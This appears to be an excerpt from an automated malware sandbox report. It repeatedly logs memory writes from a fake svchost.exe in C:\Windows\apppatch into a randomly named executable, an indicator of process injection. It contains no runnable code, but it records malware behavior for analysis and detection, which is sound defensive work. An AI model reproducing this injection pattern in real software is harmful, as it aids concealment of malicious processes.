Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1111000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1112000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1165000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: FB0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: FB1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: FB2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1005000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1220000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1221000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1222000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1275000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: AD0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: AD1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: AD2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: B25000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: B30000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: B31000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: B32000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: B85000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 6D0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 6D1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 6D2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 725000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1090000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1091000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1092000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 10E5000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1260000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1261000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1262000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 12B5000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1190000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1191000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1192000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 11E5000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: D90000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: D91000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: D92000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: DE5000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1500000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1501000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1502000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1555000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: F40000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: F41000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: F42000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: F95000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: A20000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: A21000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: A22000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: A75000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: EE0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: EE1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: EE2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: F35000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 16D0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 16D1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 16D2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1725000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1060000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1061000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1062000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 10B5000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1450000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1451000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1452000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 14A5000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: CF0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: CF1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: CF2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: D45000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: ED0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: ED1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: ED2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: F25000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1160000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1161000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1162000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 11B5000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 13A0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 13A1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 13A2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 13F5000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 860000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 861000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 862000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 8B5000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: BF0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: BF1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: BF2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: C45000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1060000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1061000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1062000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 10B5000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1250000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1251000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1252000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 12A5000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1270000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1271000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1272000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 12C5000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 11B0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 11B1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 11B2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1205000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: D10000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: D11000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: D12000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: D65000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 800000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 801000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 802000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 855000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 860000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 861000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 862000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 8B5000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 790000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 791000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 792000Jump to behavior
